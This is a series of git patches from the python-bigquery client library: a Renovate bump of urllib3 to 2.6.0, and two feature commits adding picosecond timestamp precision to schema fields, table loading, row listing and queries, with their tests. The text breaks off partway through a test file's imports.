--- ### Configuration πŸ“… **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. β™» **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. πŸ”• **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 8955e0cfd..ec5c7f2af 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.5.0 +urllib3==2.6.0 From 8d5785aea50b9f9e5b13bd4c91e8a08d6dac7778 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Fri, 19 Dec 2025 10:44:31 -0800 Subject: [PATCH 192/202] feat: support timestamp_precision in table schema (#2333) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Thank you for opening a Pull Request! Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # πŸ¦• --------- Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- google/cloud/bigquery/enums.py | 15 ++++++++ google/cloud/bigquery/schema.py | 55 ++++++++++++++++++++++++----- tests/system/test_client.py | 23 +++++++++++++ tests/unit/test_schema.py | 61 ++++++++++++++++++++++++++++++++- 4 files changed, 144 insertions(+), 10 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 1b1eb241a..dc67f9674 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -480,3 +480,18 @@ class SourceColumnMatch(str, enum.Enum): NAME = "NAME" """Matches by name. This reads the header row as column names and reorders columns to match the field names in the schema.""" + + +class TimestampPrecision(enum.Enum): + """Precision (maximum number of total digits in base 10) for seconds of + TIMESTAMP type.""" + + MICROSECOND = None + """ + Default, for TIMESTAMP type with microsecond precision. + """ + + PICOSECOND = 12 + """ + For TIMESTAMP type with picosecond precision. + """ diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 456730b00..1809df21f 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -196,6 +196,14 @@ class SchemaField(object): Only valid for top-level schema fields (not nested fields). If the type is FOREIGN, this field is required. + + timestamp_precision: Optional[enums.TimestampPrecision] + Precision (maximum number of total digits in base 10) for seconds + of TIMESTAMP type. + + Defaults to `enums.TimestampPrecision.MICROSECOND` (`None`) for + microsecond precision. Use `enums.TimestampPrecision.PICOSECOND` + (`12`) for picosecond precision. """ def __init__( @@ -213,6 +221,7 @@ def __init__( range_element_type: Union[FieldElementType, str, None] = None, rounding_mode: Union[enums.RoundingMode, str, None] = None, foreign_type_definition: Optional[str] = None, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ): self._properties: Dict[str, Any] = { "name": name, @@ -237,6 +246,13 @@ def __init__( if isinstance(policy_tags, PolicyTagList) else None ) + if isinstance(timestamp_precision, enums.TimestampPrecision): + self._properties["timestampPrecision"] = timestamp_precision.value + elif timestamp_precision is not None: + raise ValueError( + "timestamp_precision must be class enums.TimestampPrecision " + f"or None, got {type(timestamp_precision)} instead." + ) if isinstance(range_element_type, str): self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): @@ -254,15 +270,22 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": """Return a ``SchemaField`` object deserialized from a dictionary. Args: - api_repr (Mapping[str, str]): The serialized representation - of the SchemaField, such as what is output by - :meth:`to_api_repr`. + api_repr (dict): The serialized representation of the SchemaField, + such as what is output by :meth:`to_api_repr`. Returns: google.cloud.bigquery.schema.SchemaField: The ``SchemaField`` object. """ placeholder = cls("this_will_be_replaced", "PLACEHOLDER") + # The API would return a string despite we send an integer. To ensure + # success of resending received schema, we convert string to integer + # to ensure consistency. + try: + api_repr["timestampPrecision"] = int(api_repr["timestampPrecision"]) + except (TypeError, KeyError): + pass + # Note: we don't make a copy of api_repr because this can cause # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD # fields. See https://github.com/googleapis/python-bigquery/issues/6 @@ -374,6 +397,16 @@ def policy_tags(self): resource = self._properties.get("policyTags") return PolicyTagList.from_api_repr(resource) if resource is not None else None + @property + def timestamp_precision(self) -> enums.TimestampPrecision: + """Precision (maximum number of total digits in base 10) for seconds of + TIMESTAMP type. + + Returns: + enums.TimestampPrecision: value of TimestampPrecision. + """ + return enums.TimestampPrecision(self._properties.get("timestampPrecision")) + def to_api_repr(self) -> dict: """Return a dictionary representing this schema field. @@ -408,6 +441,8 @@ def _key(self): None if self.policy_tags is None else tuple(sorted(self.policy_tags.names)) ) + timestamp_precision = self._properties.get("timestampPrecision") + return ( self.name, field_type, @@ -417,6 +452,7 @@ def _key(self): self.description, self.fields, policy_tags, + timestamp_precision, ) def to_standard_sql(self) -> standard_sql.StandardSqlField: @@ -467,10 +503,9 @@ def __hash__(self): return hash(self._key()) def __repr__(self): - key = self._key() - policy_tags = key[-1] + *initial_tags, policy_tags, timestamp_precision_tag = self._key() policy_tags_inst = None if policy_tags is None else PolicyTagList(policy_tags) - adjusted_key = key[:-1] + (policy_tags_inst,) + adjusted_key = (*initial_tags, policy_tags_inst, timestamp_precision_tag) return f"{self.__class__.__name__}{adjusted_key}" @@ -530,9 +565,11 @@ def _to_schema_fields(schema): if isinstance(schema, Sequence): # Input is a Sequence (e.g. a list): Process and return a list of SchemaFields return [ - field - if isinstance(field, SchemaField) - else SchemaField.from_api_repr(field) + ( + field + if isinstance(field, SchemaField) + else SchemaField.from_api_repr(field) + ) for field in schema ] diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 6584ca03c..3d32a3634 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -74,6 +74,16 @@ bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), ] +SCHEMA_PICOSECOND = [ + bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), + bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), + bigquery.SchemaField( + "time_pico", + "TIMESTAMP", + mode="REQUIRED", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ), +] CLUSTERING_SCHEMA = [ bigquery.SchemaField("full_name", "STRING", mode="REQUIRED"), bigquery.SchemaField("age", "INTEGER", mode="REQUIRED"), @@ -631,6 +641,19 @@ def test_create_table_w_time_partitioning_w_clustering_fields(self): self.assertEqual(time_partitioning.field, "transaction_time") self.assertEqual(table.clustering_fields, ["user_email", "store_code"]) + def test_create_table_w_picosecond_timestamp(self): + dataset = self.temp_dataset(_make_dataset_id("create_table")) + table_id = "test_table" + table_arg = Table(dataset.table(table_id), schema=SCHEMA_PICOSECOND) + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + + self.assertTrue(_table_exists(table)) + self.assertEqual(table.table_id, table_id) + self.assertEqual(table.schema, SCHEMA_PICOSECOND) + def test_delete_dataset_with_string(self): dataset_id = _make_dataset_id("delete_table_true_with_string") project = Config.CLIENT.project diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index c63a8312c..f61b22035 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -52,6 +52,9 @@ def test_constructor_defaults(self): self.assertIsNone(field.default_value_expression) self.assertEqual(field.rounding_mode, None) self.assertEqual(field.foreign_type_definition, None) + self.assertEqual( + field.timestamp_precision, enums.TimestampPrecision.MICROSECOND + ) def test_constructor_explicit(self): FIELD_DEFAULT_VALUE_EXPRESSION = "This is the default value for this field" @@ -69,6 +72,7 @@ def test_constructor_explicit(self): default_value_expression=FIELD_DEFAULT_VALUE_EXPRESSION, rounding_mode=enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED, foreign_type_definition="INTEGER", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, ) self.assertEqual(field.name, "test") self.assertEqual(field.field_type, "STRING") @@ -87,6 +91,10 @@ def test_constructor_explicit(self): ) self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") self.assertEqual(field.foreign_type_definition, "INTEGER") + self.assertEqual( + field.timestamp_precision, + enums.TimestampPrecision.PICOSECOND, + ) def test_constructor_explicit_none(self): field = self._make_one("test", "STRING", description=None, policy_tags=None) @@ -189,6 +197,23 @@ def test_to_api_repr_with_subfield(self): }, ) + def test_to_api_repr_w_timestamp_precision(self): + field = self._make_one( + "foo", + "TIMESTAMP", + "NULLABLE", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ) + self.assertEqual( + field.to_api_repr(), + { + "mode": "NULLABLE", + "name": "foo", + "type": "TIMESTAMP", + "timestampPrecision": 12, + }, + ) + def test_from_api_repr(self): field = self._get_target_class().from_api_repr( { @@ -198,6 +223,7 @@ def test_from_api_repr(self): "name": "foo", "type": "record", "roundingMode": "ROUNDING_MODE_UNSPECIFIED", + "timestampPrecision": 12, } ) self.assertEqual(field.name, "foo") @@ -210,6 +236,10 @@ def test_from_api_repr(self): self.assertEqual(field.fields[0].mode, "NULLABLE") self.assertEqual(field.range_element_type, None) self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") + self.assertEqual( + field.timestamp_precision, + enums.TimestampPrecision.PICOSECOND, + ) def test_from_api_repr_policy(self): field = self._get_target_class().from_api_repr( @@ -264,6 +294,17 @@ def test_from_api_repr_defaults(self): self.assertNotIn("policyTags", field._properties) self.assertNotIn("rangeElementType", field._properties) + def test_from_api_repr_timestamp_precision_str(self): + # The backend would return timestampPrecision field as a string, even + # if we send over an integer. This test verifies we manually converted + # it into integer to ensure resending could succeed. + field = self._get_target_class().from_api_repr( + { + "timestampPrecision": "12", + } + ) + self.assertEqual(field._properties["timestampPrecision"], 12) + def test_name_property(self): name = "lemon-ness" schema_field = self._make_one(name, "INTEGER") @@ -323,6 +364,22 @@ def test_foreign_type_definition_property_str(self): schema_field._properties["foreignTypeDefinition"] = FOREIGN_TYPE_DEFINITION self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + def test_timestamp_precision_unsupported_type(self): + with pytest.raises(ValueError) as e: + self._make_one("test", "TIMESTAMP", timestamp_precision=12) + + assert "timestamp_precision must be class enums.TimestampPrecision" in str( + e.value + ) + + def test_timestamp_precision_property(self): + TIMESTAMP_PRECISION = enums.TimestampPrecision.PICOSECOND + schema_field = self._make_one("test", "TIMESTAMP") + schema_field._properties[ + "timestampPrecision" + ] = enums.TimestampPrecision.PICOSECOND.value + self.assertEqual(schema_field.timestamp_precision, TIMESTAMP_PRECISION) + def test_to_standard_sql_simple_type(self): examples = ( # a few legacy types @@ -637,7 +694,9 @@ def test___hash__not_equals(self): def test___repr__(self): field1 = self._make_one("field1", "STRING") - expected = "SchemaField('field1', 'STRING', 'NULLABLE', None, None, (), None)" + expected = ( + "SchemaField('field1', 'STRING', 'NULLABLE', None, None, (), None, None)" + ) self.assertEqual(repr(field1), expected) def test___repr__evaluable_no_policy_tags(self): From 46764a59ca7a21ed14ad2c91eb7f98c302736c22 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Mon, 5 Jan 2026 18:42:05 -0800 Subject: [PATCH 193/202] feat: support load_table and list_rows with picosecond timestamp (#2351) --- google/cloud/bigquery/_helpers.py | 10 ++- google/cloud/bigquery/_job_helpers.py | 20 ++++- google/cloud/bigquery/client.py | 31 ++++++- google/cloud/bigquery/job/load.py | 30 +++++++ tests/data/pico.csv | 3 + tests/data/pico_schema.json | 8 ++ tests/system/conftest.py | 19 +++++ tests/system/test_client.py | 23 ++++++ tests/system/test_list_rows.py | 20 +++++ tests/system/test_query.py | 13 +++ tests/unit/_helpers/test_cell_data_parser.py | 13 ++- tests/unit/job/test_load_config.py | 33 ++++++++ tests/unit/test__job_helpers.py | 30 +++++++ tests/unit/test_client.py | 85 +++++++++++++++++++- 14 files changed, 328 insertions(+), 10 deletions(-) create mode 100644 tests/data/pico.csv create mode 100644 tests/data/pico_schema.json diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index c7d7705e0..a35fe1677 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -32,6 +32,8 @@ from google.cloud._helpers import _RFC3339_MICROS from google.cloud._helpers import _RFC3339_NO_FRACTION from google.cloud._helpers import _to_bytes +from google.cloud.bigquery import enums + from google.auth import credentials as ga_credentials # type: ignore from google.api_core import client_options as client_options_lib @@ -252,11 +254,15 @@ def bytes_to_py(self, value, field): if _not_null(value, field): return base64.standard_b64decode(_to_bytes(value)) - def timestamp_to_py(self, value, field): - """Coerce 'value' to a datetime, if set or not nullable.""" + def timestamp_to_py(self, value, field) -> Union[datetime.datetime, str, None]: + """Coerce 'value' to a datetime, if set or not nullable. If timestamp + is of picosecond precision, preserve the string format.""" + if field.timestamp_precision == enums.TimestampPrecision.PICOSECOND: + return value if _not_null(value, field): # value will be a integer in seconds, to microsecond precision, in UTC. return _datetime_from_microseconds(int(value)) + return None def datetime_to_py(self, value, field): """Coerce 'value' to a datetime, if set or not nullable. diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 27e90246f..30f89759e 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -49,6 +49,7 @@ import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries +from google.cloud.bigquery import enums from google.cloud.bigquery import job import google.cloud.bigquery.job.query import google.cloud.bigquery.query @@ -265,6 +266,7 @@ def _to_query_request( query: str, location: Optional[str] = None, timeout: Optional[float] = None, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> Dict[str, Any]: """Transform from Job resource to QueryRequest resource. @@ -285,10 +287,15 @@ def _to_query_request( # Default to standard SQL. request_body.setdefault("useLegacySql", False) - # Since jobs.query can return results, ensure we use the lossless timestamp - # format. See: https://github.com/googleapis/python-bigquery/issues/395 request_body.setdefault("formatOptions", {}) - request_body["formatOptions"]["useInt64Timestamp"] = True # type: ignore + + # Cannot specify both use_int64_timestamp and timestamp_output_format. + if timestamp_precision == enums.TimestampPrecision.PICOSECOND: + request_body["formatOptions"]["timestampOutputFormat"] = "ISO8601_STRING" # type: ignore + else: + # Since jobs.query can return results, ensure we use the lossless + # timestamp format. See: https://github.com/googleapis/python-bigquery/issues/395 + request_body["formatOptions"]["useInt64Timestamp"] = True # type: ignore if timeout is not None: # Subtract a buffer for context switching, network latency, etc. @@ -370,6 +377,7 @@ def query_jobs_query( retry: retries.Retry, timeout: Optional[float], job_retry: Optional[retries.Retry], + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> job.QueryJob: """Initiate a query using jobs.query with jobCreationMode=JOB_CREATION_REQUIRED. @@ -377,7 +385,11 @@ def query_jobs_query( """ path = _to_query_path(project) request_body = _to_query_request( - query=query, job_config=job_config, location=location, timeout=timeout + query=query, + job_config=job_config, + location=location, + timeout=timeout, + timestamp_precision=timestamp_precision, ) def do_query(): diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index c50e7c2d7..e3a3cdb11 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3469,6 +3469,8 @@ def query( timeout: TimeoutType = DEFAULT_TIMEOUT, job_retry: Optional[retries.Retry] = DEFAULT_JOB_RETRY, api_method: Union[str, enums.QueryApiMethod] = enums.QueryApiMethod.INSERT, + *, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> job.QueryJob: """Run a SQL query. @@ -3524,6 +3526,11 @@ def query( See :class:`google.cloud.bigquery.enums.QueryApiMethod` for details on the difference between the query start methods. + timestamp_precision (Optional[enums.TimestampPrecision]): + [Private Preview] If set to `enums.TimestampPrecision.PICOSECOND`, + timestamp columns of picosecond precision will be returned with + full precision. Otherwise, will truncate to microsecond + precision. Only applies when api_method == `enums.QueryApiMethod.QUERY`. Returns: google.cloud.bigquery.job.QueryJob: A new query job instance. @@ -3543,6 +3550,15 @@ def query( "`job_id` was provided, but the 'QUERY' `api_method` was requested." ) + if ( + timestamp_precision == enums.TimestampPrecision.PICOSECOND + and api_method != enums.QueryApiMethod.QUERY + ): + raise ValueError( + "Picosecond Timestamp is only supported when `api_method " + "== enums.QueryApiMethod.QUERY`." + ) + if project is None: project = self.project @@ -3568,6 +3584,7 @@ def query( retry, timeout, job_retry, + timestamp_precision=timestamp_precision, ) elif api_method == enums.QueryApiMethod.INSERT: return _job_helpers.query_jobs_insert( @@ -4062,6 +4079,8 @@ def list_rows( page_size: Optional[int] = None, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + *, + timestamp_precision: Optional[enums.TimestampPrecision] = None, ) -> RowIterator: """List the rows of the table. @@ -4110,6 +4129,11 @@ def list_rows( before using ``retry``. If multiple requests are made under the hood, ``timeout`` applies to each individual request. + timestamp_precision (Optional[enums.TimestampPrecision]): + [Private Preview] If set to `enums.TimestampPrecision.PICOSECOND`, + timestamp columns of picosecond precision will be returned with + full precision. Otherwise, will truncate to microsecond + precision. Returns: google.cloud.bigquery.table.RowIterator: @@ -4143,7 +4167,12 @@ def list_rows( if start_index is not None: params["startIndex"] = start_index - params["formatOptions.useInt64Timestamp"] = True + # Cannot specify both use_int64_timestamp and timestamp_output_format. + if timestamp_precision == enums.TimestampPrecision.PICOSECOND: + params["formatOptions.timestampOutputFormat"] = "ISO8601_STRING" + else: + params["formatOptions.useInt64Timestamp"] = True + row_iterator = RowIterator( client=self, api_request=functools.partial(self._call_api, retry, timeout=timeout), diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 8cdb779ac..9c74f7124 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -759,6 +759,36 @@ def column_name_character_map(self, value: Optional[str]): value = ColumnNameCharacterMap.COLUMN_NAME_CHARACTER_MAP_UNSPECIFIED self._set_sub_prop("columnNameCharacterMap", value) + @property + def timestamp_target_precision(self) -> Optional[List[int]]: + """Optional[list[int]]: [Private Preview] Precisions (maximum number of + total digits in base 10) for seconds of TIMESTAMP types that are + allowed to the destination table for autodetection mode. + + Available for the formats: CSV. + + For the CSV Format, Possible values include: + None, [], or [6]: timestamp(6) for all auto detected TIMESTAMP + columns. + [6, 12]: timestamp(6) for all auto detected TIMESTAMP columns that + have less than 6 digits of subseconds. timestamp(12) for all auto + detected TIMESTAMP columns that have more than 6 digits of + subseconds. + [12]: timestamp(12) for all auto detected TIMESTAMP columns. + + The order of the elements in this array is ignored. Inputs that have + higher precision than the highest target precision in this array will + be truncated. + """ + return self._get_sub_prop("timestampTargetPrecision") + + @timestamp_target_precision.setter + def timestamp_target_precision(self, value: Optional[List[int]]): + if value is not None: + self._set_sub_prop("timestampTargetPrecision", value) + else: + self._del_sub_prop("timestampTargetPrecision") + class LoadJob(_AsyncJob): """Asynchronous job for loading data into a table. diff --git a/tests/data/pico.csv b/tests/data/pico.csv new file mode 100644 index 000000000..bcc853040 --- /dev/null +++ b/tests/data/pico.csv @@ -0,0 +1,3 @@ +2025-01-01T00:00:00.123456789012Z +2025-01-02T00:00:00.123456789012Z +2025-01-03T00:00:00.123456789012Z \ No newline at end of file diff --git a/tests/data/pico_schema.json b/tests/data/pico_schema.json new file mode 100644 index 000000000..8227917ea --- /dev/null +++ b/tests/data/pico_schema.json @@ -0,0 +1,8 @@ +[ + { + "name": "pico_col", + "type": "TIMESTAMP", + "mode": "NULLABLE", + "timestampPrecision": "12" + } +] diff --git a/tests/system/conftest.py b/tests/system/conftest.py index 8efa042af..123aeb6e7 100644 --- a/tests/system/conftest.py +++ b/tests/system/conftest.py @@ -98,12 +98,14 @@ def load_scalars_table( data_path: str = "scalars.jsonl", source_format=enums.SourceFormat.NEWLINE_DELIMITED_JSON, schema_source="scalars_schema.json", + timestamp_target_precision=None, ) -> str: schema = bigquery_client.schema_from_json(DATA_DIR / schema_source) table_id = data_path.replace(".", "_") + hex(random.randrange(1000000)) job_config = bigquery.LoadJobConfig() job_config.schema = schema job_config.source_format = source_format + job_config.timestamp_target_precision = timestamp_target_precision full_table_id = f"{project_id}.{dataset_id}.{table_id}" with open(DATA_DIR / data_path, "rb") as data_file: job = bigquery_client.load_table_from_file( @@ -169,6 +171,23 @@ def scalars_table_csv( bigquery_client.delete_table(full_table_id, not_found_ok=True) +@pytest.fixture(scope="session") +def scalars_table_pico( + bigquery_client: bigquery.Client, project_id: str, dataset_id: str +): + full_table_id = load_scalars_table( + bigquery_client, + project_id, + dataset_id, + data_path="pico.csv", + source_format=enums.SourceFormat.CSV, + schema_source="pico_schema.json", + timestamp_target_precision=[12], + ) + yield full_table_id + bigquery_client.delete_table(full_table_id, not_found_ok=True) + + @pytest.fixture def test_table_name(request, replace_non_anum=re.compile(r"[^a-zA-Z0-9_]").sub): return replace_non_anum("_", request.node.name) diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 3d32a3634..7e773598e 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -1295,6 +1295,29 @@ def test_load_table_from_json_schema_autodetect_table_exists(self): self.assertEqual(tuple(table.schema), table_schema) self.assertEqual(table.num_rows, 2) + def test_load_table_from_csv_w_picosecond_timestamp(self): + dataset_id = _make_dataset_id("bq_system_test") + self.temp_dataset(dataset_id) + table_id = "{}.{}.load_table_from_json_basic_use".format( + Config.CLIENT.project, dataset_id + ) + + table_schema = Config.CLIENT.schema_from_json(DATA_PATH / "pico_schema.json") + # create the table before loading so that the column order is predictable + table = helpers.retry_403(Config.CLIENT.create_table)( + Table(table_id, schema=table_schema) + ) + self.to_delete.insert(0, table) + + # do not pass an explicit job config to trigger automatic schema detection + with open(DATA_PATH / "pico.csv", "rb") as f: + load_job = Config.CLIENT.load_table_from_file(f, table_id) + load_job.result() + + table = Config.CLIENT.get_table(table) + self.assertEqual(list(table.schema), table_schema) + self.assertEqual(table.num_rows, 3) + def test_load_avro_from_uri_then_dump_table(self): from google.cloud.bigquery.job import CreateDisposition from google.cloud.bigquery.job import SourceFormat diff --git a/tests/system/test_list_rows.py b/tests/system/test_list_rows.py index 108b842ce..02b07744b 100644 --- a/tests/system/test_list_rows.py +++ b/tests/system/test_list_rows.py @@ -132,3 +132,23 @@ def test_list_rows_range(bigquery_client: bigquery.Client, scalars_table_csv: st row_null = rows[1] assert row_null["range_date"] is None + + +def test_list_rows_pico(bigquery_client: bigquery.Client, scalars_table_pico: str): + rows = bigquery_client.list_rows( + scalars_table_pico, timestamp_precision=enums.TimestampPrecision.PICOSECOND + ) + rows = list(rows) + row = rows[0] + assert row["pico_col"] == "2025-01-01T00:00:00.123456789012Z" + + +def test_list_rows_pico_truncate( + bigquery_client: bigquery.Client, scalars_table_pico: str +): + # For a picosecond timestamp column, if the user does not explicitly set + # timestamp_precision, will return truncated microsecond precision. + rows = bigquery_client.list_rows(scalars_table_pico) + rows = list(rows) + row = rows[0] + assert row["pico_col"] == "1735689600123456" diff --git a/tests/system/test_query.py b/tests/system/test_query.py index d94a117e3..b8bb06a4c 100644 --- a/tests/system/test_query.py +++ b/tests/system/test_query.py @@ -21,6 +21,7 @@ import pytest from google.cloud import bigquery +from google.cloud.bigquery import enums from google.cloud.bigquery.query import ArrayQueryParameter from google.cloud.bigquery.query import ScalarQueryParameter from google.cloud.bigquery.query import ScalarQueryParameterType @@ -546,3 +547,15 @@ def test_session(bigquery_client: bigquery.Client, query_api_method: str): assert len(rows) == 1 assert rows[0][0] == 5 + + +def test_query_picosecond(bigquery_client: bigquery.Client): + job = bigquery_client.query( + "SELECT CAST('2025-10-20' AS TIMESTAMP(12));", + api_method="QUERY", + timestamp_precision=enums.TimestampPrecision.PICOSECOND, + ) + + result = job.result() + rows = list(result) + assert rows[0][0] == "2025-10-20T00:00:00.000000000000Z" diff --git a/tests/unit/_helpers/test_cell_data_parser.py b/tests/unit/_helpers/test_cell_data_parser.py index 14721a26c..f75e63b48 100644 --- a/tests/unit/_helpers/test_cell_data_parser.py +++ b/tests/unit/_helpers/test_cell_data_parser.py @@ -290,17 +290,26 @@ def test_bytes_to_py_w_base64_encoded_text(object_under_test): def test_timestamp_to_py_w_string_int_value(object_under_test): from google.cloud._helpers import _EPOCH - coerced = object_under_test.timestamp_to_py("1234567", object()) + coerced = object_under_test.timestamp_to_py("1234567", create_field()) assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) def test_timestamp_to_py_w_int_value(object_under_test): from google.cloud._helpers import _EPOCH - coerced = object_under_test.timestamp_to_py(1234567, object()) + coerced = object_under_test.timestamp_to_py(1234567, create_field()) assert coerced == _EPOCH + datetime.timedelta(seconds=1, microseconds=234567) +def test_timestamp_to_py_w_picosecond_precision(object_under_test): + from google.cloud.bigquery import enums + + pico_schema = create_field(timestamp_precision=enums.TimestampPrecision.PICOSECOND) + pico_timestamp = "2025-01-01T00:00:00.123456789012Z" + coerced = object_under_test.timestamp_to_py(pico_timestamp, pico_schema) + assert coerced == pico_timestamp + + def test_datetime_to_py_w_string_value(object_under_test): coerced = object_under_test.datetime_to_py("2016-12-02T18:51:33", object()) assert coerced == datetime.datetime(2016, 12, 2, 18, 51, 33) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 27d3cead1..2e046bfbf 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -1061,9 +1061,40 @@ def test_column_name_character_map_none(self): "parquetOptions": {"enableListInference": True}, "columnNameCharacterMap": "V2", "someNewField": "some-value", + "timestampTargetPrecision": [6, 12], } } + def test_timestamp_target_precision_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.timestamp_target_precision) + + def test_timestamp_target_precision_hit(self): + timestamp_target_precision = [6, 12] + config = self._get_target_class()() + config._properties["load"][ + "timestampTargetPrecision" + ] = timestamp_target_precision + self.assertEqual(config.timestamp_target_precision, timestamp_target_precision) + + def test_timestamp_target_precision_setter(self): + timestamp_target_precision = [6, 12] + config = self._get_target_class()() + config.timestamp_target_precision = timestamp_target_precision + self.assertEqual( + config._properties["load"]["timestampTargetPrecision"], + timestamp_target_precision, + ) + + def test_timestamp_target_precision_setter_w_none(self): + timestamp_target_precision = [6, 12] + config = self._get_target_class()() + config._properties["load"][ + "timestampTargetPrecision" + ] = timestamp_target_precision + config.timestamp_target_precision = None + self.assertFalse("timestampTargetPrecision" in config._properties["load"]) + def test_from_api_repr(self): from google.cloud.bigquery.job import ( CreateDisposition, @@ -1103,6 +1134,7 @@ def test_from_api_repr(self): self.assertTrue(config.parquet_options.enable_list_inference) self.assertEqual(config.column_name_character_map, ColumnNameCharacterMap.V2) self.assertEqual(config._properties["load"]["someNewField"], "some-value") + self.assertEqual(config.timestamp_target_precision, [6, 12]) def test_to_api_repr(self): from google.cloud.bigquery.job import ( @@ -1140,6 +1172,7 @@ def test_to_api_repr(self): config.parquet_options = parquet_options config.column_name_character_map = ColumnNameCharacterMap.V2 config._properties["load"]["someNewField"] = "some-value" + config.timestamp_target_precision = [6, 12] api_repr = config.to_api_repr() diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 10cbefe13..19390c7ec 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -335,6 +335,7 @@ def test_query_jobs_query_defaults(): assert request["location"] == "asia-northeast1" assert request["formatOptions"]["useInt64Timestamp"] is True assert "timeoutMs" not in request + assert "timestampOutputFormat" not in request["formatOptions"] def test_query_jobs_query_sets_format_options(): @@ -400,6 +401,35 @@ def test_query_jobs_query_sets_timeout(timeout, expected_timeout): assert request["timeoutMs"] == expected_timeout +def test_query_jobs_query_picosecond(): + mock_client = mock.create_autospec(Client) + mock_retry = mock.create_autospec(retries.Retry) + mock_job_retry = mock.create_autospec(retries.Retry) + mock_client._call_api.return_value = { + "jobReference": { + "projectId": "test-project", + "jobId": "abc", + "location": "asia-northeast1", + } + } + _job_helpers.query_jobs_query( + mock_client, + "SELECT * FROM test", + None, + "asia-northeast1", + "test-project", + mock_retry, + None, + mock_job_retry, + enums.TimestampPrecision.PICOSECOND, + ) + + _, call_kwargs = mock_client._call_api.call_args + request = call_kwargs["data"] + assert "useInt64Timestamp" not in request["formatOptions"] + assert request["formatOptions"]["timestampOutputFormat"] == "ISO8601_STRING" + + def test_query_and_wait_uses_jobs_insert(): """With unsupported features, call jobs.insert instead of jobs.query.""" client = mock.create_autospec(Client) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 213f382dc..1c4a9badb 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -55,7 +55,7 @@ from google.cloud import bigquery from google.cloud.bigquery.dataset import DatasetReference, Dataset -from google.cloud.bigquery.enums import UpdateMode, DatasetView +from google.cloud.bigquery.enums import UpdateMode, DatasetView, TimestampPrecision from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import 